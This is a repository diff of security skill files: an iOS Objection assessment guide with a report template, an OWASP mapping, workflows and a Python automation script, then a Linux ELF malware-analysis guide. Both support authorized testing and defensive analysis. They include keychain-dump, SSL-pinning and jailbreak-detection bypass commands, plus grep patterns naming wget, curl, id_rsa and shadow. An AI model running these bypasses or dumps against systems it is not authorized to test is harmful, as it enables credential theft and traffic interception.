- **Keychain access scope**: Objection can only dump keychain items within the app's access group. System keychain items require separate jailbreak-level tools.
- **Swift name mangling**: Swift class and method names are mangled in the runtime. Use `ios hooking search classes <keyword>` to locate the mangled names before hooking.
- **Non-persistent changes**: All Objection modifications are runtime-only and reset on app restart. Document findings immediately.
|
||||
@@ -0,0 +1,80 @@
|
||||
# iOS Objection Security Assessment Report

## Engagement Information

| Field | Value |
|-------|-------|
| Application | [APP_NAME] |
| Bundle ID | [BUNDLE_ID] |
| iOS Version | [IOS_VERSION] |
| Device | [DEVICE_MODEL] |
| Device State | [Jailbroken/Non-Jailbroken] |
| Assessment Date | [DATE] |
| Analyst | [ANALYST] |
| Objection Version | [VERSION] |

## Executive Summary

[Brief narrative of findings from Objection runtime analysis]

## Keychain Analysis

| Service | Account | Data Type | Protection Class | Risk |
|---------|---------|-----------|-----------------|------|
| [SERVICE] | [ACCOUNT] | [TYPE] | [CLASS] | [RISK] |

**Findings**: [Description of sensitive data found in keychain]

## Data Storage Assessment

### NSUserDefaults
| Key | Contains Sensitive Data | Risk |
|-----|----------------------|------|
| [KEY] | [YES/NO] | [RISK] |

### SQLite Databases
| Database | Encrypted | Sensitive Tables | Risk |
|----------|-----------|-----------------|------|
| [DB_NAME] | [YES/NO] | [TABLES] | [RISK] |

### Filesystem
| Path | Contents | Protection | Risk |
|------|----------|-----------|------|
| [PATH] | [DESCRIPTION] | [ATTRIBUTE] | [RISK] |

## Network Security

| Check | Result | Details |
|-------|--------|---------|
| SSL Pinning Present | [YES/NO] | [IMPLEMENTATION_DETAILS] |
| SSL Pinning Bypass | [SUCCESS/FAIL] | [METHOD_USED] |
| ATS Configuration | [STRICT/RELAXED] | [EXCEPTIONS] |

## Binary Protection Assessment

| Protection | Status | Details |
|-----------|--------|---------|
| Jailbreak Detection | [Present/Absent] | [BYPASS_DIFFICULTY] |
| Frida Detection | [Present/Absent] | [DETAILS] |
| Debug Detection | [Present/Absent] | [DETAILS] |
| Code Obfuscation | [Yes/No] | [DETAILS] |

## Memory Analysis

| Search Pattern | Found | Risk | Details |
|---------------|-------|------|---------|
| Passwords | [YES/NO] | [RISK] | [DETAILS] |
| Auth Tokens | [YES/NO] | [RISK] | [DETAILS] |
| API Keys | [YES/NO] | [RISK] | [DETAILS] |
| JWTs | [YES/NO] | [RISK] | [DETAILS] |

## Recommendations

### Critical
1. [RECOMMENDATION]

### High
1. [RECOMMENDATION]

### Medium
1. [RECOMMENDATION]
|
||||
@@ -0,0 +1,43 @@
|
||||
# Standards Reference: iOS App Security with Objection

## OWASP Mobile Top 10 2024 Mapping

| OWASP ID | Risk | Objection Testing Coverage |
|----------|------|---------------------------|
| M1 | Improper Credential Usage | Keychain dumping, memory string search for hardcoded credentials |
| M3 | Insecure Authentication/Authorization | Hook authentication methods, bypass biometric checks |
| M5 | Insecure Communication | SSL pinning bypass, network class hooking |
| M7 | Insufficient Binary Protections | Jailbreak detection bypass, Frida detection assessment |
| M8 | Security Misconfiguration | Info.plist review, URL scheme analysis, ATS configuration |
| M9 | Insecure Data Storage | NSUserDefaults inspection, SQLite database access, file system review |

## OWASP MASVS v2.0 Control Mapping

| MASVS Category | Objection Commands | Assessment Area |
|----------------|-------------------|-----------------|
| MASVS-STORAGE | `ios keychain dump`, `ios nsuserdefaults get`, `sqlite connect` | Sensitive data in keychain, NSUserDefaults, databases |
| MASVS-CRYPTO | `memory search`, hook crypto framework calls | Key storage, algorithm selection |
| MASVS-AUTH | Hook LAContext, authentication classes | Biometric bypass, session management |
| MASVS-NETWORK | `ios sslpinning disable`, hook NSURLSession | Certificate pinning, cleartext traffic |
| MASVS-PLATFORM | Hook URL scheme handlers, pasteboard monitor | Deep link security, clipboard exposure |
| MASVS-CODE | `memory list modules`, binary inspection | Debugging symbols, framework analysis |
| MASVS-RESILIENCE | `ios jailbreak disable`, Frida detection hooks | Anti-tampering, anti-debugging |

## OWASP MASTG Test Cases

| Test ID | Description | Objection Approach |
|---------|-------------|-------------------|
| MASTG-TEST-0053 | Testing Local Storage for Sensitive Data | `ios keychain dump`, filesystem inspection |
| MASTG-TEST-0057 | Testing Backups for Sensitive Data | Check backup exclusion attributes |
| MASTG-TEST-0060 | Testing Custom URL Schemes | Hook `application:openURL:options:` |
| MASTG-TEST-0063 | Testing for Sensitive Data in Logs | Monitor NSLog calls via hooking |
| MASTG-TEST-0066 | Testing Enforced App Transport Security | Inspect Info.plist ATS configuration |

## Apple Platform Security Requirements

| Requirement | Assessment Method |
|-------------|-------------------|
| Keychain Access Control | Verify kSecAttrAccessible values via keychain dump |
| App Transport Security | Check Info.plist for NSAllowsArbitraryLoads exceptions |
| Data Protection API | Verify file protection attributes on sensitive files |
| Secure Enclave Usage | Hook SecKey operations for biometric-protected keys |
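
The App Transport Security check can also be done offline against a copy of the app's `Info.plist`. The sketch below uses Python's standard `plistlib`; the key names are Apple's documented ATS keys, while the `summarize_ats` helper and the shape of its result are assumptions made for illustration.

```python
import plistlib


def summarize_ats(info_plist_bytes: bytes) -> dict:
    """Summarize ATS relaxations found in raw Info.plist bytes (XML or binary)."""
    plist = plistlib.loads(info_plist_bytes)
    ats = plist.get("NSAppTransportSecurity", {})
    exception_domains = ats.get("NSExceptionDomains", {})
    # Domains that explicitly allow cleartext HTTP loads.
    insecure_domains = sorted(
        domain
        for domain, config in exception_domains.items()
        if config.get("NSExceptionAllowsInsecureHTTPLoads", False)
    )
    return {
        "allows_arbitrary_loads": bool(ats.get("NSAllowsArbitraryLoads", False)),
        "insecure_exception_domains": insecure_domains,
    }


if __name__ == "__main__":
    sample = plistlib.dumps({
        "NSAppTransportSecurity": {
            "NSExceptionDomains": {
                "legacy.example.com": {"NSExceptionAllowsInsecureHTTPLoads": True},
            }
        }
    })
    print(summarize_ats(sample))
```

A plist with no `NSAppTransportSecurity` dictionary yields `allows_arbitrary_loads: False` and an empty domain list, which corresponds to the default (strict) ATS behavior.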
|
||||
@@ -0,0 +1,83 @@
|
||||
# Workflows: iOS App Security with Objection
|
||||
|
||||
## Workflow 1: iOS Runtime Security Assessment
|
||||
|
||||
```
|
||||
[Setup Environment] --> [Prepare Device] --> [Attach Objection] --> [Runtime Analysis]
|
||||
| | | |
|
||||
v v v v
|
||||
[Install Frida] [Jailbroken: Start [Connect via USB] [Data Storage Check]
|
||||
[Install Objection] frida-server] [Spawn target app] [Network Security]
|
||||
[Non-JB: Patch IPA] [Auth Mechanism Review]
|
||||
[Binary Protection Test]
|
||||
|
|
||||
v
|
||||
[Document Findings]
|
||||
[Generate Report]
|
||||
```
|
||||
|
||||
## Workflow 2: SSL Pinning Bypass for Traffic Interception
|
||||
|
||||
```
|
||||
[Configure Burp Proxy] --> [Set device proxy] --> [Attach Objection]
|
||||
|
|
||||
v
|
||||
[ios sslpinning disable]
|
||||
|
|
||||
v
|
||||
[Navigate app in browser/UI]
|
||||
|
|
||||
v
|
||||
[Capture HTTPS traffic in Burp]
|
||||
[Analyze API endpoints]
|
||||
[Test authentication flows]
|
||||
[Check for sensitive data in transit]
|
||||
```
|
||||
|
||||
## Workflow 3: Keychain and Data Storage Assessment
|
||||
|
||||
```
|
||||
[Attach Objection] --> [ios keychain dump] --> [Analyze keychain items]
|
||||
| |
|
||||
v v
|
||||
[ios nsuserdefaults get] [Check protection classes]
|
||||
| [Identify sensitive tokens]
|
||||
v [Verify encryption at rest]
|
||||
[List app sandbox files]
|
||||
|
|
||||
v
|
||||
[sqlite connect *.db]
|
||||
[Query sensitive tables]
|
||||
|
|
||||
v
|
||||
[memory search "password"]
|
||||
[memory search "token"]
|
||||
[memory search "secret"]
|
||||
```
|
||||
|
||||
## Workflow 4: Jailbreak Detection Assessment
|
||||
|
||||
```
|
||||
[Attach Objection] --> [ios jailbreak disable] --> [Navigate app]
|
||||
| |
|
||||
v [App functions normally?]
|
||||
[Hook detection methods] / \
|
||||
[Monitor file checks] [Yes] [No]
|
||||
[Monitor Cydia URL scheme] | |
|
||||
| [Detection [Additional detection
|
||||
v bypassed] methods exist]
|
||||
[Document detection |
|
||||
methods found] [Hook deeper: search
|
||||
[Assess bypass for custom checks]
|
||||
difficulty] [Frida script for
|
||||
targeted bypass]
|
||||
```
|
||||
|
||||
## Decision Matrix: Testing Approach
|
||||
|
||||
| Device State | IPA Access | Approach |
|-------------|-----------|----------|
| Jailbroken | Not needed | Direct Frida server + Objection attach |
| Non-jailbroken | Available | Patch IPA with `objection patchipa` |
| Non-jailbroken | Not available | Request IPA from client or use device management |
| Emulator | N/A | Limited: Frida on Corellium or similar platform |
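
The decision matrix can be expressed as a small lookup, which is convenient when a pre-engagement checklist is scripted. This is only a sketch: the function name `choose_approach` and its accepted state strings are assumptions of this example, and the returned text mirrors the table rows.

```python
def choose_approach(device_state: str, ipa_available: bool = False) -> str:
    """Return the testing approach from the decision matrix for a device state."""
    state = device_state.strip().lower()
    if state == "jailbroken":
        # IPA access is not needed on a jailbroken device.
        return "Direct Frida server + Objection attach"
    if state == "non-jailbroken":
        if ipa_available:
            return "Patch IPA with objection patchipa"
        return "Request IPA from client or use device management"
    if state == "emulator":
        return "Limited: Frida on Corellium or similar platform"
    raise ValueError(f"unknown device state: {device_state!r}")


if __name__ == "__main__":
    print(choose_approach("Non-jailbroken", ipa_available=True))
```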
|
||||
@@ -0,0 +1,294 @@
|
||||
#!/usr/bin/env python3
"""
Objection iOS Security Assessment Automation

Automates common Objection commands for iOS app security testing.
Runs keychain dump, storage inspection, SSL pinning check, and jailbreak detection analysis.

Usage:
    python process.py --bundle-id com.target.app [--device-id UDID] [--output report.json]
"""

import argparse
import json
import subprocess
import sys
from datetime import datetime
from typing import Optional


class ObjectionAssessor:
    """Automates Objection-based iOS security assessment tasks."""

    def __init__(self, bundle_id: str, device_id: Optional[str] = None):
        self.bundle_id = bundle_id
        self.device_id = device_id
        self.findings = []

    def _device_args(self) -> list:
        """Select a specific device by ID, or fall back to the USB device."""
        return ["-D", self.device_id] if self.device_id else ["-U"]

    def _run_objection_command(self, command: str, timeout: int = 30) -> str:
        """Execute an Objection command and return output."""
        cmd = ["objection", "--gadget", self.bundle_id, "run", command]
        if self.device_id:
            cmd.insert(1, "--serial")
            cmd.insert(2, self.device_id)

        try:
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=timeout,
            )
            return result.stdout + result.stderr
        except subprocess.TimeoutExpired:
            return f"TIMEOUT: Command '{command}' exceeded {timeout}s"
        except FileNotFoundError:
            return "ERROR: Objection not found. Install with: pip install objection"

    def _run_frida_command(self, script: str, timeout: int = 15) -> str:
        """Execute a Frida script snippet."""
        # -N attaches by application identifier (bundle ID); -q exits after -e runs.
        cmd = ["frida", *self._device_args(), "-N", self.bundle_id, "-q", "-e", script]

        try:
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=timeout,
            )
            return result.stdout
        except (subprocess.TimeoutExpired, FileNotFoundError):
            return ""

    def check_frida_connectivity(self) -> dict:
        """Verify Frida can connect to the device."""
        # -a lists running applications together with their bundle identifiers,
        # which is what the target_running check below needs.
        cmd = ["frida-ps", *self._device_args(), "-a"]

        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
            connected = result.returncode == 0
            # Subtract the header row and the separator row.
            lines = result.stdout.strip().split("\n")
            processes = max(len(lines) - 2, 0) if connected else 0
            return {
                "connected": connected,
                "process_count": processes,
                "target_running": self.bundle_id in result.stdout,
            }
        except (subprocess.TimeoutExpired, FileNotFoundError):
            return {"connected": False, "process_count": 0, "target_running": False}

    def dump_keychain(self) -> dict:
        """Dump keychain items accessible to the app."""
        output = self._run_objection_command("ios keychain dump")
        items = []
        current_item = {}

        for line in output.split("\n"):
            line = line.strip()
            if "Service" in line and ":" in line:
                if current_item:
                    items.append(current_item)
                current_item = {"service": line.split(":", 1)[-1].strip()}
            elif "Account" in line and ":" in line:
                current_item["account"] = line.split(":", 1)[-1].strip()
            elif "Data" in line and ":" in line:
                data = line.split(":", 1)[-1].strip()
                current_item["data_preview"] = data[:50] + "..." if len(data) > 50 else data
                current_item["data_length"] = len(data)

        if current_item:
            items.append(current_item)

        finding = {
            "check": "keychain_dump",
            "category": "MASVS-STORAGE",
            "owasp_mobile": "M9",
            "items_found": len(items),
            "items": items[:20],
            "severity": "HIGH" if items else "INFO",
            "description": f"Found {len(items)} keychain items accessible to the application",
        }
        self.findings.append(finding)
        return finding

    def check_nsuserdefaults(self) -> dict:
        """Inspect NSUserDefaults for sensitive data."""
        output = self._run_objection_command("ios nsuserdefaults get")
        sensitive_patterns = [
            "password", "token", "secret", "key", "auth",
            "session", "credential", "api_key", "apikey",
        ]

        sensitive_entries = []
        for line in output.split("\n"):
            line_lower = line.lower()
            for pattern in sensitive_patterns:
                if pattern in line_lower:
                    sensitive_entries.append(line.strip())
                    break

        finding = {
            "check": "nsuserdefaults",
            "category": "MASVS-STORAGE",
            "owasp_mobile": "M9",
            "sensitive_entries": len(sensitive_entries),
            "entries": sensitive_entries[:10],
            "severity": "HIGH" if sensitive_entries else "PASS",
            "description": f"Found {len(sensitive_entries)} potentially sensitive NSUserDefaults entries",
        }
        self.findings.append(finding)
        return finding

    def check_ssl_pinning(self) -> dict:
        """Assess SSL pinning implementation.

        The result is a heuristic based on keywords in the command output;
        confirm it by observing traffic in an intercepting proxy.
        """
        output = self._run_objection_command("ios sslpinning disable")
        pinning_detected = "pinning" in output.lower() or "hook" in output.lower()

        finding = {
            "check": "ssl_pinning",
            "category": "MASVS-NETWORK",
            "owasp_mobile": "M5",
            "pinning_detected": pinning_detected,
            "bypass_output": output[:500],
            "severity": "MEDIUM" if not pinning_detected else "INFO",
            "description": "SSL pinning " + ("detected and bypassed" if pinning_detected else "not detected"),
        }
        self.findings.append(finding)
        return finding

    def check_jailbreak_detection(self) -> dict:
        """Assess jailbreak detection implementation (keyword heuristic)."""
        output = self._run_objection_command("ios jailbreak disable")
        detection_found = "hook" in output.lower() or "bypass" in output.lower()

        finding = {
            "check": "jailbreak_detection",
            "category": "MASVS-RESILIENCE",
            "owasp_mobile": "M7",
            "detection_implemented": detection_found,
            "bypass_output": output[:500],
            "severity": "MEDIUM" if not detection_found else "INFO",
            "description": "Jailbreak detection " + ("found" if detection_found else "not found or not implemented"),
        }
        self.findings.append(finding)
        return finding

    def search_sensitive_memory(self) -> dict:
        """Search app memory for sensitive strings."""
        patterns = ["password", "Bearer ", "eyJ", "api_key", "secret"]
        memory_findings = []

        for pattern in patterns:
            output = self._run_objection_command(f'memory search "{pattern}" --string')
            matches = output.count("Found")
            if matches > 0:
                memory_findings.append({
                    "pattern": pattern,
                    "matches": matches,
                })

        finding = {
            "check": "memory_search",
            "category": "MASVS-STORAGE",
            "owasp_mobile": "M9",
            "patterns_with_matches": len(memory_findings),
            "details": memory_findings,
            "severity": "HIGH" if memory_findings else "PASS",
            "description": f"Found sensitive patterns in memory for {len(memory_findings)} search terms",
        }
        self.findings.append(finding)
        return finding

    def get_app_info(self) -> dict:
        """Gather basic app information."""
        output = self._run_objection_command("ios info binary")
        env_output = self._run_objection_command("env")

        return {
            "bundle_id": self.bundle_id,
            "binary_info": output[:1000],
            "environment": env_output[:1000],
        }

    def generate_report(self) -> dict:
        """Generate consolidated assessment report."""
        severity_counts = {"HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0, "PASS": 0}
        for f in self.findings:
            sev = f.get("severity", "INFO")
            severity_counts[sev] = severity_counts.get(sev, 0) + 1

        return {
            "assessment": {
                "target": self.bundle_id,
                "date": datetime.now().isoformat(),
                "tool": "Objection (Frida-powered)",
                "type": "iOS Runtime Security Assessment",
            },
            "summary": {
                "total_checks": len(self.findings),
                "severity_breakdown": severity_counts,
                "critical_findings": [
                    f for f in self.findings if f.get("severity") in ("HIGH", "CRITICAL")
                ],
            },
            "findings": self.findings,
        }


def main():
    parser = argparse.ArgumentParser(
        description="Objection iOS Security Assessment Automation"
    )
    parser.add_argument("--bundle-id", required=True, help="iOS app bundle identifier")
    parser.add_argument("--device-id", help="Device UDID for targeting specific device")
    parser.add_argument("--output", default="objection_report.json", help="Output report path")
    parser.add_argument("--checks", nargs="+",
                        default=["keychain", "nsuserdefaults", "ssl", "jailbreak", "memory"],
                        help="Checks to run")
    args = parser.parse_args()

    assessor = ObjectionAssessor(args.bundle_id, args.device_id)

    # Verify connectivity
    connectivity = assessor.check_frida_connectivity()
    if not connectivity["connected"]:
        print("[-] ERROR: Cannot connect to device via Frida")
        print("    Ensure Frida server is running on device or IPA is patched")
        sys.exit(1)

    print(f"[+] Connected to device. Target running: {connectivity['target_running']}")

    # Run selected checks
    check_map = {
        "keychain": assessor.dump_keychain,
        "nsuserdefaults": assessor.check_nsuserdefaults,
        "ssl": assessor.check_ssl_pinning,
        "jailbreak": assessor.check_jailbreak_detection,
        "memory": assessor.search_sensitive_memory,
    }

    for check in args.checks:
        if check in check_map:
            print(f"[*] Running check: {check}")
            result = check_map[check]()
            print(f"    Severity: {result['severity']} - {result['description']}")

    # Generate report
    report = assessor.generate_report()

    with open(args.output, "w", encoding="utf-8") as f:
        json.dump(report, f, indent=2)
    print(f"\n[+] Report saved: {args.output}")

    # Summary
    high_count = report["summary"]["severity_breakdown"].get("HIGH", 0)
    if high_count > 0:
        print(f"[!] {high_count} HIGH severity findings require attention")


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,331 @@
|
||||
---
name: analyzing-linux-elf-malware
description: >
  Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets,
  cryptominers, ransomware, and rootkits targeting Linux servers, containers, and cloud
  infrastructure. Covers static analysis, dynamic tracing, and reverse engineering of
  x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis,
  ELF binary investigation, Linux server compromise assessment, or container malware analysis.
domain: cybersecurity
subdomain: malware-analysis
tags: [malware, Linux, ELF, reverse-engineering, server-malware]
version: 1.0.0
author: mahipal
license: MIT
---
|
||||
|
||||
# Analyzing Linux ELF Malware
|
||||
|
||||
## When to Use
|
||||
|
||||
- A Linux server or container has been compromised and suspicious ELF binaries are found
- Analyzing Linux botnets (Mirai, Gafgyt, XorDDoS), cryptominers, or ransomware
- Investigating malware targeting cloud infrastructure, Docker containers, or Kubernetes pods
- Reverse engineering Linux rootkits and kernel modules
- Analyzing cross-platform malware compiled for Linux x86_64, ARM, or MIPS architectures
|
||||
|
||||
**Do not use** for Windows PE binary analysis; use PEStudio, Ghidra, or IDA for Windows malware.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra or IDA with Linux ELF support for disassembly and decompilation
- Linux analysis VM (Ubuntu 22.04 recommended) with development tools installed
- strace, ltrace, and GDB for dynamic analysis and debugging
- readelf, objdump, and nm from GNU binutils for static inspection
- Radare2 for quick binary triage and scripted analysis
- Docker for isolated container-based malware execution
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify ELF Binary Properties
|
||||
|
||||
Examine the ELF header and basic properties:
|
||||
|
||||
```bash
# File type identification
file suspect_binary

# Detailed ELF header analysis
readelf -h suspect_binary

# Section headers
readelf -S suspect_binary

# Program headers (segments)
readelf -l suspect_binary

# Symbol table (if not stripped)
readelf -s suspect_binary
nm suspect_binary 2>/dev/null

# Dynamic linking information
readelf -d suspect_binary
# Isolated VM only: ldd may execute code from the binary, and it needs a matching architecture
ldd suspect_binary 2>/dev/null

# Compute hashes
md5sum suspect_binary
sha256sum suspect_binary

# Check for UPX packing (tests the integrity of a UPX-packed file)
upx -t suspect_binary
```
|
||||
|
||||
```python
# Python-based ELF analysis (requires pyelftools: pip install pyelftools)
import hashlib
import math
from collections import Counter

from elftools.elf.elffile import ELFFile

with open("suspect_binary", "rb") as f:
    sha256 = hashlib.sha256(f.read()).hexdigest()

with open("suspect_binary", "rb") as f:
    # ELFFile reads lazily, so all parsing stays inside the with block
    elf = ELFFile(f)

    print(f"SHA-256: {sha256}")
    print(f"Class: {elf.elfclass}-bit")
    print(f"Endian: {'Little' if elf.little_endian else 'Big'}")
    print(f"Machine: {elf.header.e_machine}")
    print(f"Type: {elf.header.e_type}")
    print(f"Entry Point: 0x{elf.header.e_entry:X}")

    # Check if stripped
    symtab = elf.get_section_by_name('.symtab')
    print(f"Stripped: {'Yes' if symtab is None else 'No'}")

    # Section entropy analysis (values near 8.0 suggest packed or encrypted data)
    for section in elf.iter_sections():
        data = section.data()
        if len(data) > 0:
            entropy = -sum((c/len(data)) * math.log2(c/len(data))
                           for c in Counter(data).values() if c > 0)
            if entropy > 7.0:
                print(f"  [!] High entropy section: {section.name} ({entropy:.2f})")
```
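
When pyelftools is not available on the analysis host, the same header fields can be read with the standard library alone. The sketch below parses the fixed-offset fields of the ELF header with `struct`; the `parse_elf_header` name and the small lookup tables are assumptions of this example and cover only a few common `e_type` and `e_machine` values.

```python
import struct

# Partial lookup tables (illustrative subset of the ELF specification values).
ELF_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
ELF_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86_64", 183: "AArch64"}


def parse_elf_header(data: bytes) -> dict:
    """Parse class, endianness, type, machine, and entry point from ELF bytes."""
    if len(data) < 32 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file or header truncated")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # e_type and e_machine follow the 16-byte e_ident array.
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    # e_entry is 4 bytes for ELF32 and 8 bytes for ELF64, at offset 24.
    (e_entry,) = struct.unpack_from(endian + ("I" if ei_class == 1 else "Q"), data, 24)
    return {
        "class": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, hex(e_type)),
        "machine": ELF_MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
    }


if __name__ == "__main__":
    with open("suspect_binary", "rb") as f:
        print(parse_elf_header(f.read(64)))
```

Only the first 64 bytes are read, so the sample is never loaded or executed; unknown type or machine codes are reported as hex rather than guessed.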
|
||||
|
||||
### Step 2: Extract Strings and Indicators
|
||||
|
||||
Search for embedded IOCs and functionality clues:
|
||||
|
||||
```bash
# ASCII strings
strings suspect_binary > strings_output.txt

# Search for network indicators
grep -iE "(http|https|ftp)://" strings_output.txt
grep -iE "([0-9]{1,3}\.){3}[0-9]{1,3}" strings_output.txt
grep -iE "[a-zA-Z0-9.-]+\.(com|net|org|io|ru|cn)" strings_output.txt

# Search for shell commands
grep -iE "(bash|sh|wget|curl|chmod|/tmp/|/dev/)" strings_output.txt

# Search for crypto mining indicators
grep -iE "(stratum|xmr|monero|pool\.|mining)" strings_output.txt

# Search for SSH/credential theft
grep -iE "(ssh|authorized_keys|id_rsa|shadow|passwd)" strings_output.txt

# Search for persistence mechanisms
grep -iE "(crontab|systemd|init\.d|rc\.local|ld\.so\.preload)" strings_output.txt

# FLOSS for obfuscated strings (if available)
floss suspect_binary
```
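
The network-indicator greps above can be consolidated into a script that deduplicates results and discards impossible IPv4 values such as version strings. This is a minimal sketch; the `extract_iocs` function, its regular expressions, and the output shape are assumptions of this example rather than part of any tool named here.

```python
import re

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(lines) -> dict:
    """Collect unique URLs and plausible IPv4 addresses from strings output."""
    urls, ips = set(), set()
    for line in lines:
        urls.update(URL_RE.findall(line))
        for candidate in IPV4_RE.findall(line):
            # Keep only dotted quads whose octets are all in 0..255.
            if all(int(octet) <= 255 for octet in candidate.split(".")):
                ips.add(candidate)
    return {"urls": sorted(urls), "ipv4": sorted(ips)}


if __name__ == "__main__":
    with open("strings_output.txt", encoding="utf-8", errors="replace") as f:
        print(extract_iocs(f))
```

Dotted quads that pass the range check can still be false positives (for example library version numbers), so treat the output as candidates to verify, not confirmed indicators.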
|
||||
|
||||
### Step 3: Analyze System Calls and Library Usage
|
||||
|
||||
Identify what system calls and libraries the malware uses:
|
||||
|
||||
```bash
# List relocation entries that reference imported functions (dynamically linked binaries)
readelf -r suspect_binary | grep -E "socket|connect|exec|fork|open|write|bind|listen"

# Trace system calls during execution (in isolated VM only)
strace -f -e trace=network,process,file -o strace_output.txt ./suspect_binary

# Trace library calls (in isolated VM only)
ltrace -f -o ltrace_output.txt ./suspect_binary

# Key system calls to watch:
# Network: socket, connect, bind, listen, accept, sendto, recvfrom
# Process: fork, execve, clone, kill, ptrace
# File: open, read, write, unlink, rename, chmod
# File monitoring: inotify_add_watch
```
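
A long `strace -f -o` log is easier to triage once the calls are grouped by the categories listed above. The following sketch assumes the usual `strace -o` line layout (optional PID, then `syscall(args) = result`); the `summarize_strace` helper is hypothetical, and `openat` is added to the file category as an assumption because modern libc versions commonly use it in place of `open`.

```python
import re
from collections import Counter

# Optional PID prefix (present with -f), then the syscall name and "(".
SYSCALL_RE = re.compile(r"^(?:\d+\s+)?([a-z_][a-z0-9_]*)\(")

CATEGORIES = {
    "network": {"socket", "connect", "bind", "listen", "accept", "sendto", "recvfrom"},
    "process": {"fork", "execve", "clone", "kill", "ptrace"},
    "file": {"open", "openat", "read", "write", "unlink", "rename", "chmod"},
}


def summarize_strace(lines) -> dict:
    """Count watched syscalls per category; other lines are ignored."""
    counts = {name: Counter() for name in CATEGORIES}
    for line in lines:
        match = SYSCALL_RE.match(line)
        if not match:
            continue  # signals, exit markers, and "<... resumed>" lines
        syscall = match.group(1)
        for category, names in CATEGORIES.items():
            if syscall in names:
                counts[category][syscall] += 1
    return {category: dict(counter) for category, counter in counts.items()}


if __name__ == "__main__":
    with open("strace_output.txt", encoding="utf-8", errors="replace") as f:
        print(summarize_strace(f))
```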
|
||||
|
||||
### Step 4: Dynamic Analysis with GDB
|
||||
|
||||
Debug the malware to observe runtime behavior:
|
||||
|
||||
```bash
# Start GDB with the binary (in isolated VM only)
gdb ./suspect_binary

# Set breakpoints on key functions
(gdb) break main
(gdb) break socket
(gdb) break connect
(gdb) break execve
(gdb) break fork

# Run and analyze
(gdb) run
(gdb) info registers       # View register state
(gdb) x/s $rdi             # Examine the first argument as a string (x86_64)
(gdb) bt                   # Backtrace
(gdb) continue

# For stripped binaries, break on entry point
(gdb) break *0x400580      # Example address: use the entry point reported by readelf -h
(gdb) run

# Monitor network connections during execution
# In another terminal:
ss -tlnp    # List listening sockets
ss -tnp     # List established connections
```
|
||||
|
||||
### Step 5: Reverse Engineer with Ghidra
|
||||
|
||||
Perform deep code analysis on the ELF binary:
|
||||
|
||||
```
Ghidra Analysis for Linux ELF:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Import: File -> Import -> Select ELF binary
   - Ghidra auto-detects ELF format and architecture
   - Accept default analysis options

2. Key analysis targets:
   - main() function (or entry point if stripped)
   - Socket creation and connection functions
   - Command dispatch logic (switch/case on received data)
   - Encryption/encoding routines
   - Persistence installation code
   - Self-propagation/scanning functions

3. For Mirai-like botnets, look for:
   - Credential list for brute-forcing (telnet/SSH)
   - Attack module selection (UDP flood, SYN flood, ACK flood)
   - Scanner module (port scanning for vulnerable devices)
   - Killer module (killing competing botnets)

4. For cryptominers, look for:
   - Mining pool connection (stratum protocol)
   - Wallet address strings
   - CPU/GPU utilization functions
   - Process hiding techniques
```
|
||||
|
||||
### Step 6: Analyze Linux-Specific Persistence
|
||||
|
||||
Check for persistence mechanisms:
|
||||
|
||||
```bash
|
||||
# Check for LD_PRELOAD rootkit
|
||||
strings suspect_binary | grep "ld.so.preload"
|
||||
# Malware writing to /etc/ld.so.preload can hook all dynamic library calls
|
||||
|
||||
# Check for crontab persistence
|
||||
strings suspect_binary | grep -i "cron"
|
||||
|
||||
# Check for systemd service creation
|
||||
strings suspect_binary | grep -iE "systemd|\.service|systemctl"
|
||||
|
||||
# Check for init script creation
|
||||
strings suspect_binary | grep -iE "init\.d|rc\.local|update-rc"
|
||||
|
||||
# Check for SSH key injection
|
||||
strings suspect_binary | grep -i "authorized_keys"
|
||||
|
||||
# Check for kernel module (rootkit) loading
|
||||
strings suspect_binary | grep -iE "insmod|modprobe|init_module"
|
||||
|
||||
# Check for process hiding
|
||||
strings suspect_binary | grep -iE "/proc|readdir|getdents"
|
||||
```
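
The grep checks above can also be run in one pass from Python, which is convenient when triaging many samples. The following is a minimal sketch, not part of the original skill: the group names, `extract_strings`, and `find_persistence_indicators` are hypothetical helpers, and the patterns simply mirror the greps above.

```python
import re

# Indicator groups mirror the grep patterns above; the group names are illustrative.
PERSISTENCE_PATTERNS = {
    "ld_preload": re.compile(rb"ld\.so\.preload", re.I),
    "cron": re.compile(rb"cron", re.I),
    "systemd": re.compile(rb"systemd|\.service|systemctl", re.I),
    "init": re.compile(rb"init\.d|rc\.local|update-rc", re.I),
    "ssh_keys": re.compile(rb"authorized_keys", re.I),
    "kernel_module": re.compile(rb"insmod|modprobe|init_module", re.I),
}


def extract_strings(data: bytes, min_len: int = 4):
    """Yield printable-ASCII runs of at least min_len bytes, roughly like strings(1)."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group()


def find_persistence_indicators(data: bytes) -> dict:
    """Return {group name: [matching strings]} for every indicator group that hits."""
    hits = {}
    for candidate in extract_strings(data):
        for name, pattern in PERSISTENCE_PATTERNS.items():
            if pattern.search(candidate):
                hits.setdefault(name, []).append(candidate.decode("ascii"))
    return hits
```

A typical call reads the sample as bytes (never executing it), for example `find_persistence_indicators(open("suspect_binary", "rb").read())`. String hits only show that the text is embedded in the binary; packed or encrypted samples may show nothing until unpacked.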
|
||||
|
||||
## Key Concepts
|
||||
|
||||
